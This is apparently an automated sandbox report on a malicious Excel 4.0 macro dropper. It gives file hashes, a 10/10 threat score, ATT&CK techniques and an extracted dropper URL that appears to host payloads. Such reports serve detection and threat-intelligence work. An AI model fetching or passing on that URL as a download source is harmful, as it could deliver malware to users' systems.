General

  • Target

    7343c2f1c8923a7f77f71e8e4dcc9180212c13f5040fd1b513d4f26fd30bad41

  • Size

    36KB

  • Sample

    230129-x2y42scb31

  • MD5

    4e258fc16f9f1bd37a59896f9d56beb4

  • SHA1

    af80d1c572dcf5a227dc2bfa341433967242b11f

  • SHA256

    7343c2f1c8923a7f77f71e8e4dcc9180212c13f5040fd1b513d4f26fd30bad41

  • SHA512

    5d631619c1e47cafc03de68d62f11997189ac03313c8cb79dab3d5f2a070b5e27be8aa7e71e9dae23684d8f4e726a05a64e6c10626a4e4cf033d8e5551720597

  • SSDEEP

    768:EPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJugTyRZLAHWl:gok3hbdlylKsgqopeJBWhZFGkE+cL2Nt

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://markens.online/wp-data.php

Targets

    • Target

      7343c2f1c8923a7f77f71e8e4dcc9180212c13f5040fd1b513d4f26fd30bad41

    • Size

      36KB

    • MD5

      4e258fc16f9f1bd37a59896f9d56beb4

    • SHA1

      af80d1c572dcf5a227dc2bfa341433967242b11f

    • SHA256

      7343c2f1c8923a7f77f71e8e4dcc9180212c13f5040fd1b513d4f26fd30bad41

    • SHA512

      5d631619c1e47cafc03de68d62f11997189ac03313c8cb79dab3d5f2a070b5e27be8aa7e71e9dae23684d8f4e726a05a64e6c10626a4e4cf033d8e5551720597

    • SSDEEP

      768:EPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJugTyRZLAHWl:gok3hbdlylKsgqopeJBWhZFGkE+cL2Nt

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks